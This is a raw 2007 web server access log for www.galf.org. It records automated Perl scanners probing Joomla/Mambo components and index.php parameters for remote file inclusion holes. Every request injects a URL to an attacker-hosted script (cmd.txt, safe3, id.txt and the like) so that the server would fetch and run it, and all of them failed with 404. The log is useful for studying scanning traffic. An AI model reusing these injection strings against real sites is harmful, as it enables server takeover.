67.59.185.50 - - [14/Oct/2007:12:21:40 -0700] "GET /logs/index.php?include=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
67.59.185.50 - - [14/Oct/2007:12:21:40 -0700] "GET /index.php?include=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:22:22 -0700] "GET /logs/access_070826.log//modules/xt_conteudo/class/toolbars.class.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:22:22 -0700] "GET /logs/access_070826.log//modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:22:23 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:22:25 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:07 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:09 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.241.216.187 - - [14/Oct/2007:12:23:11 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.216.187 - - [14/Oct/2007:12:23:11 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.57.189.226 - - [14/Oct/2007:12:23:27 -0700] "GET /logs//index.php3?s=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.57.189.226 - - [14/Oct/2007:12:23:33 -0700] "GET //index.php3?s=http://www.dunakom.hu/userimages/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:46 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:47 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:47 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:49 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:49 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:52 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:53 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:53 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:53 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:23:59 -0700] "GET /logs/access.log/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:24:00 -0700] "GET /index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:24:00 -0700] "GET /logs/index.php?arquivo=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.122.194 - - [14/Oct/2007:12:24:54 -0700] "GET /logs/access_070917.log/index.php?s=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.86.122.194 - - [14/Oct/2007:12:24:55 -0700] "GET /index.php?s=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.122.194 - - [14/Oct/2007:12:24:55 -0700] "GET /logs/index.php?s=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.72.112.19 - - [14/Oct/2007:12:25:06 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
64.72.112.19 - - [14/Oct/2007:12:25:06 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rh4m4.t35.com/s.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.galf.org"
62.193.248.204 - - [14/Oct/2007:12:25:44 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.193.248.204 - - [14/Oct/2007:12:25:44 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
65.69.224.10 - - [14/Oct/2007:12:25:46 -0700] "GET /logs/access_070625.log//index.php?page=http://www.winonachiefs.com//sitebcx/newspublish//q3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [14/Oct/2007:12:25:46 -0700] "GET /logs/access_070625.log//index.php?page=http://www.winonachiefs.com//sitebcx/newspublish//q3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [14/Oct/2007:12:25:47 -0700] "GET /logs//index.php?page=http://www.winonachiefs.com//sitebcx/newspublish//q3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [14/Oct/2007:12:25:47 -0700] "GET /logs//index.php?page=http://www.winonachiefs.com//sitebcx/newspublish//q3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.148.25.162 - - [14/Oct/2007:12:25:47 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.148.25.162 - - [14/Oct/2007:12:25:47 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.148.25.162 - - [14/Oct/2007:12:25:47 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.148.25.162 - - [14/Oct/2007:12:26:04 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
219.1.9.8 - - [14/Oct/2007:12:26:18 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
219.1.9.8 - - [14/Oct/2007:12:26:19 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
219.1.9.8 - - [14/Oct/2007:12:26:19 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
194.126.193.82 - - [14/Oct/2007:12:26:31 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/scan/cmdscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
194.126.193.82 - - [14/Oct/2007:12:26:32 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/scan/cmdscan.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
65.98.14.194 - - [14/Oct/2007:12:26:40 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://missdica.com/board/skin/zero_vote/u.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
65.98.14.194 - - [14/Oct/2007:12:26:40 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://missdica.com/board/skin/zero_vote/u.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
219.1.9.8 - - [14/Oct/2007:12:26:52 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
65.69.224.10 - - [14/Oct/2007:12:26:59 -0700] "GET /logs/access_070917.log//index.php?page=http://www.winonachiefs.com//sitebcx/newspublish//q3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.69.224.10 - - [14/Oct/2007:12:27:00 -0700] "GET /logs/access_070917.log//index.php?page=http://www.winonachiefs.com//sitebcx/newspublish//q3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
68.150.27.118 - - [14/Oct/2007:12:27:00 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.150.27.118 - - [14/Oct/2007:12:27:01 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.150.27.118 - - [14/Oct/2007:12:27:01 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.105.208.186 - - [14/Oct/2007:12:27:06 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.163.167.235 - - [14/Oct/2007:12:27:08 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.bassanesi.com.br/admin/common/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.105.208.186 - - [14/Oct/2007:12:27:09 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.150.27.118 - - [14/Oct/2007:12:27:18 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://prvib.braindead.hu/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:27:22 -0700] "GET //components/com_moodle/moodle.php?mosConfig_absolute_path=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:27:22 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:27:22 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:27:25 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:27:25 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:27:45 -0700] "GET /logs/access_070723.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:27:45 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:27:50 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:27:50 -0700] "GET /logs/access.log//components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:12:27:53 -0700] "GET /logs/index2.php?content=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:27:56 -0700] "GET /logs/access_070917.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:27:56 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:27:57 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
61.67.192.15 - - [14/Oct/2007:12:27:57 -0700] "GET /logs/access_070827.log//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.17.17.82 - - [14/Oct/2007:12:27:57 -0700] "GET /index2.php?content=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:28:41 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:28:42 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:28:51 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:28:52 -0700] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:28:53 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:28:56 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
211.108.60.242 - - [14/Oct/2007:12:28:57 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:30:38 -0700] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
204.15.10.33 - - [14/Oct/2007:12:30:39 -0700] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://speakerformula.com/speakerformula/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:30:49 -0700] "GET /logs/access.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [14/Oct/2007:12:30:50 -0700] "GET /index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [14/Oct/2007:12:30:50 -0700] "GET /logs/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:30:53 -0700] "GET /logs/access.log/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:30:53 -0700] "GET /index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:30:53 -0700] "GET /logs/index.php?inc=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
216.104.34.22 - - [14/Oct/2007:12:32:13 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.104.34.22 - - [14/Oct/2007:12:32:15 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.104.34.22 - - [14/Oct/2007:12:32:15 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.216.205.186 - - [14/Oct/2007:12:32:17 -0700] "GET /logs/access.log/test.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.205.186 - - [14/Oct/2007:12:32:17 -0700] "GET /test.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.216.205.186 - - [14/Oct/2007:12:32:17 -0700] "GET /logs/test.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:32:28 -0700] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69"
217.110.144.106 - - [14/Oct/2007:12:32:29 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
74.52.77.106 - - [14/Oct/2007:12:32:48 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.77.106 - - [14/Oct/2007:12:32:48 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.52.77.106 - - [14/Oct/2007:12:32:49 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.86.122.194 - - [14/Oct/2007:12:32:57 -0700] "GET /logs/access_070820.log/index.php?page=?=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.122.194 - - [14/Oct/2007:12:32:57 -0700] "GET /index.php?page=?=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
74.86.122.194 - - [14/Oct/2007:12:32:57 -0700] "GET /logs/index.php?page=?=http://img338.imageshack.us/img338/3305/idjv6.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.216.205.186 - - [14/Oct/2007:12:33:02 -0700] "GET /logs/access_070917.log/test.php?page=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:05 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:05 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:05 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:07 -0700] "GET /logs/access_070806.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:07 -0700] "GET /index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:07 -0700] "GET /logs/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:09 -0700] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:33:10 -0700] "GET /logs/access_070723.log/index.php?url=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:10 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:33:10 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.62.35.165 - - [14/Oct/2007:12:33:10 -0700] "GET /index.php?url=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
